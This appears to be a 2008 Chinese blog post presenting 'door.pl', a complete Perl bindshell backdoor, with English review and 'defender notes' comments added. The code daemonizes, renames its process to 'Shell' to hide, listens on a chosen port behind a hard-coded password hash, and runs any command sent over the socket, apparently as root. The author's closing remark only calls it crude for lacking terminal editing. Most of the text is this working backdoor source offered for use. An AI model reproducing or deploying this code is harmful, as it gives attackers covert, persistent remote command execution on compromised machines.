www.diybl.com 时间 : 2008-10-13 作者:佚名 编辑:本站 点击: [ 评论 ]
闲来无事,写了一个超级简单的 bindshell:客户端连接上去之后,可以把它当作最简单的 shell 使用。
door.pl 以守护进程方式启动,代码如下:
#!/usr/bin/perl -w
use strict;
use Getopt::Std;
use IO::Socket;
use POSIX;
# File-scope state shared by every sub below.
#
# $PASS is the stored password hash: Pass_check accepts a client when
# crypt($input, $PASS) eq $PASS. The 13-character value with no "$id$"
# prefix looks like a traditional DES crypt(3) hash (2-character salt "ak")
# -- NOTE(review): confirm against the target platform's crypt().
# The hash is a fixed literal in the script, so it identifies this sample.
my $PASS = "ak7JGs5/E5JCQ";

# Bind address, bind port and listening socket; filled in by check_args
# and make_sock.
my ($PORT, $IP, $socket);

# Assigning to $0 changes the name reported for the running process, so
# process listings show "Shell" instead of the script's file name.
my $PROC = "Shell";
$0 = $PROC;
# Entry point: parse the command line, detach into the background, open the
# listening socket, then serve connections. Under normal operation the last
# call does not return (the accept sub loops forever).
sub main
{
    check_args();
    daemon();
    make_sock();
    # The & sigil is required here: a plain accept() would resolve to Perl's
    # builtin accept rather than the sub defined in this file.
    &accept();
}
# Read -i (bind address) and -p (listen port) from @ARGV into the file-scope
# $IP and $PORT. Returns 1 when both are present; otherwise prints the usage
# text and exits with the default status.
#
# The values are stored as given: no format or range check is applied before
# make_sock hands them to IO::Socket::INET. Because $0 has already been
# overwritten at file scope, the usage text prints that replacement name.
sub check_args
{
    my %opt;
    getopts("i:p:", \%opt);

    unless (defined $opt{'i'} and defined $opt{'p'}) {
        print "Usage:$0 -i ipaddress -p port\nbind the Ip and listen on the Port ,waiting for client connect.\n\n this programe need two arguments,and the aguments means:\n\n -i \t\t\t\tThe ipaddress to bind\n -p \t\t\t\tListen port\ncurrent version is 1.01\nReport bugs to <027xiatian\@163.com>.\n";
        exit;
    }

    $IP   = $opt{'i'};
    $PORT = $opt{'p'};
    return 1;
}
# Detach from the launching terminal and keep running in the background.
# Forks once (the parent exits 0), points STDIN/STDOUT/STDERR at /dev/null,
# starts a new session with setsid(), then fixes cwd, umask and PATH.
#
# Defender notes: the surviving process has no terminal descriptors open,
# is a session leader, has /root as its working directory and, together
# with the $0 assignment at file scope, is listed under the name held in
# $PROC rather than the script name.
sub daemon
{
my $daemon=fork();
# A non-zero pid means this is the parent: it exits so only the child remains.
# NOTE(review): an undef return (fork failure) is not told apart from the child case.
exit 0 if($daemon);
# 2-arg opens with unchecked results; the targets are literals, so nothing
# external reaches the mode/path string. All diagnostics (including -w
# warnings) are discarded from here on.
open( STDOUT, ">/dev/null" );
open( STDIN, "</dev/null");
open( STDERR, ">&STDOUT" );
setsid();
# Hard-coded and unchecked; presumably the script is expected to run as
# root -- TODO confirm.
chdir("/root");
# No permission bits are masked for files created later, including files
# created by commands started from ExecuteShell, which inherit this umask.
umask 0;
# Fixed search path for the commands run through qx// in ExecuteShell.
$ENV{PATH} = "/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin";
}
# Open the listening socket on $IP:$PORT and store it in the file-scope
# $socket. On failure, warn and exit (the warning goes to /dev/null once
# daemon() has run, so a bind failure is silent).
#
# Defender notes: the result is a listening socket with a backlog of 100 on
# an operator-chosen address and port, owned by the renamed process.
# NOTE(review): "Rescue" and "TimeOut" do not match the option names
# documented for IO::Socket::INET (ReuseAddr/Reuse, Timeout), so they appear
# to be ignored and accept() would then block without a timeout -- confirm.
sub make_sock
{
    my @listener_opts = (
        LocalHost => $IP,
        LocalPort => $PORT,
        Listen    => 100,
        Rescue    => 1,
        TimeOut   => 15,
    );

    $socket = IO::Socket::INET->new(@listener_opts);
    if (!$socket) {
        warn "make socket err\n";
        exit;
    }
    return $socket;
}
# Connection loop: every accepted client is handed to a forked child that
# runs the password prompt and then the command loop.
#
# This sub shares its name with Perl's builtin accept; main reaches it via
# the & sigil, and $socket->accept() below is the IO::Socket method.
#
# Defender notes: one extra process per connection, each carrying the same
# rewritten process name and an inherited copy of the listening socket.
sub accept
{
# The outer loop re-enters the inner one whenever $socket->accept() returns undef.
while(1){
while(defined(my $connect=$socket->accept())){
$connect->flush();
my $pid=fork();
if($pid){
# Parent: (re)install a SIGCHLD handler that reaps all exited children
# without blocking (WNOHANG), then go back to accepting.
$SIG{CHLD}=sub {while((my $child=waitpid(-1,WNOHANG))>0) {}};
}else{
# Child; this branch is also taken when fork() returned undef.
# NOTE(review): the result of Pass_check is not tested, and nothing exits
# after ExecuteShell returns, so a child whose client disconnects drops
# back into the inner accept loop on the inherited listening socket.
# Expect lingering same-named processes holding the port.
&Pass_check($connect);
&ExecuteShell($connect);
}
}
}
}
# Password prompt for one client connection.
# Sends the banner, then reads lines from the socket until one of them,
# with CR and LF removed, hashes to $PASS under crypt(); on a match it sends
# the "#" prompt and returns 1. If the client closes the connection first,
# the loop ends without an explicit return value.
#
# Defender notes: the banner and prompt strings are sent verbatim and the
# password travels in cleartext, so both are visible to network monitoring.
# Wrong guesses are only answered with a new prompt: there is no attempt
# limit, delay or logging in this sub.
sub Pass_check
{
    my ($client) = @_;

    print $client "\n\tWelecome to use bindshell v.10 by summer \r\n\nPassword:";

    while (defined(my $attempt = <$client>)) {
        # Strip every CR and LF, wherever they occur in the line.
        $attempt =~ tr/\r\n//d;

        if (crypt($attempt, $PASS) ne $PASS) {
            print $client "\r\n Password incorrect\r\nPassword:";
            next;
        }

        print $client "\r\n#";
        return 1;
    }
}
# Command loop for one client connection.
# Each line read from the socket is run through qx// as a command line with
# stderr merged into stdout (2>&1); the captured output is written back to
# the socket line by line, followed by a "#" prompt. A line consisting of
# "exit" (optionally followed by CR) ends the child process.
#
# Defender notes: commands run with the privileges of the daemon process and
# inherit the cwd, umask and PATH set in daemon(). Nothing in this sub
# filters, restricts or logs what is executed. Commands and output cross the
# network in cleartext, and the fixed reply strings ("Exiting .....",
# "command Timeout fail !", the "#" prompt) are sent verbatim.
sub ExecuteShell
{
my $con=shift;
# On SIGALRM: report the timeout to the client and jump to the next
# iteration of the read loop below. The "next" leaves the handler sub to
# reach the enclosing while loop.
# NOTE(review): whether the command that was still running is terminated as
# well is not visible from this code.
local $SIG{ALRM}=sub { print $con("\tcommand Timeout fail !\r\n");next;};
while(defined(my $cmd=<$con>)){
chomp($cmd);
if ($cmd =~ /^exit$|^exit\r$/){
print $con("Exiting .....\r\n");
exit;
}
# Placeholder reply; replaced by the command's output when qx// returns.
my @cmd=("\tcommand execute!");
eval {
# 3-second limit per command, cleared again once the output is captured.
alarm(3);
# Network-supplied text is executed as a command line here.
@cmd=qx/$cmd 2>&1/;
alarm(0);
chomp(@cmd);
};
foreach my $line (@cmd){
print $con("$line\r\n");
}
print $con "\r\n#";
}
}
# Start the listener. Runs at load time, after the file-scope setup above
# has already replaced the process name.
main();
很明显的问题就是没有 shell 和 bash 的终端属性:输入的命令不能回退修改,敲错了就得重来,相当拙劣,呵呵。